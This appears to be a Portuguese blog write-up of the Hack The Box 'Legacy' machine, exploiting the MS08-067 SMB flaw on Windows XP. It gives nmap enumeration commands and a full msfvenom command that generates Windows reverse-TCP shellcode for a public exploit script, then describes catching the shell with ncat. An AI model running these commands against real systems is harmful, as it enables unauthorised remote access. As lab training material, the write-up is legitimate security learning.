Legacy - HTB Write Up - CVE-2008-4250 - MS08-067 Exploit

 


CVE-2008-4250 - MS08-067 Exploit

Enumeração dos serviços no servidor Legacy 

NMAP Geral 

nmap -Pn -sV [IP]


O resultado mostra o serviço SMB na porta 445 habilitado, aleḿ do MSRPC e NETBIOS. Ao testar os serviços MSRPC e NETBIOS nenhum vetor é identificado. Então, o foco é o SMB. 

Scan no serviço SMB com NMAP 

nmap -p 445 -A [IP]


O S.O identificado é Windows XP. Em seguida, executo o nmap na categoria vuln e duas vulnerabilidades críticas são identificadas: MS17-010 conhecido como Eternal Blue e MS08-067 publicado na CVE-2008-4250


Mais um scan para validar o S.O antes de buscar por exploits. 

nmap -p 445 --script=smb-os-discovery.nse [IP]


Os exploits para o Eternal Blue apresentaram erro de compatibilidade com o Python 3.10.7, então optei por testar a vulnerabilidade MS08-067 e encontrei o exploit no github https://github.com/jivoi/pentest/

O script disponível no JIVOI/PENTEST requer alteração do shellcode que pode ser gerado com o comando: 

msfvenom -p windows/shell_reverse_tcp LHOST=[IP-LOCAL] LPORT=[LOCAL-PORT] EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

O shellcode gerado com o msfvenom substituí o shellcode pré-definido no script ms08-067.py 

Depois da substituição, com o listening habilitado na máquina-atacante usando NCat, basta executar o script, conforme é mostrado abaixo. 



A conexão reversa é estabelecida


Comando set para ver as variáveis de ambiente



Referências:

[+] Github JIVOI/PENTEST

[+] MS08-067 - Microsoft Security Bulletins

Comentários

Postagens mais visitadas